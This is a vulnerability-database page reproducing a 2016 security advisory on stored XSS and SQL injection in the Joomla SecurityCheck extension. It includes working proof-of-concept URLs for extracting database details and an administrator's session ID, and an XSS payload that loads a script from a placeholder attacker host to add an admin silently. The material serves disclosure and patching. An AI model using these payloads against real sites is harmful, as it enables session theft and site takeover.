Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities

🗓️ 02 Jun 2016 00:00:00Reported by ADEO SecurityType 
zdt
 zdt🔗 0day.today👁 22 Views

Joomla! Extension SecurityCheck 2.8.9 - Multiple Vulnerabilities, Stored XSS and SQL Injection in SecurityCheck and SecurityCheck Pro, Fixed in v2.8.1

Code
Information
------------------------------
Advisory by ADEO Security Team
Name: Stored XSS and SQL Injection in Joomla SecurityCheck extension
Affected Software : SecurityCheck and SecurityCheck Pro
Vulnerable Versions: 2.8.9 (possibly below)
Vendor Homepage : https://securitycheck.protegetuordenador.com
Vulnerabilities Type : XSS and SQL Injection
Severity : High
Status : Fixed
 
Technical Details
------------------------------
PoC URLs for SQL Injection
 
For determining database, user and version.
 
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(database())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(user())))))='1
http://website/index.php?option='or(ExtractValue(1,concat(0x3a,(select(version())))))='1
 
For steal admin's session ID (If admin is not online, page response with
attack detected string. If online, response with admin's session ID)
 
http://website/index.php?option='or(ExtractValue(rand(),concat(0x3a,(SELECT
concat(session_id) FROM %23__user_usergroup_map INNER JOIN %23__users ON
%23__user_usergroup_map.user_id=%23__users.id INNER JOIN %23__session ON %
23__users.id=%23__session.userid WHERE group_id=8 LIMIT 0,1))))='1
 
PoC URLs for XSS
 
Add a new admin to website silently while admin checking SecurityCheck logs
 
http://website/index.php?option=<script>var script =
document.createElement('script');script.src = "http://ATTACKER/attack.js
";document.getElementsByTagName('head')[0].appendChild(script);</script>
 
attack.js
https://gist.github.com/MuhammetDilmac/c680cc921143543561bfdfd7b25da1ca
 
 
Disclosure Timeline
------------------------------
24/05/2016 SQL injection found
30/05/2016 Worked on one-shot exploit for SQLi
30/05/2016 While we were working on SQLi payload we also found XSS
31/05/2016 XSS payload prepared
31/05/2016 Vulnerability details and PoC sent to Protegetuordenador
31/05/2016 Vulnerabilities fixed in v2.8.10
 
Solution
------------------------------
Update to the latest version of SecurityCheck (2.8.10)
 
Credits
------------------------------
These issues have been discovered by Gokmen Guresci (gokmenguresci.com) and
Muhammet Dilmac (muhammetdilmac.com.tr).

#  0day.today [2018-03-20]  #

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
02 Jun 2016 00:00Current
7.1High risk
Vulners AI Score7.1
joomlaextensionsecuritychecksql injectionxssvulnerabilitieshigh severityfixedadeo security teamgokmen gurescimuhammet dilmac
22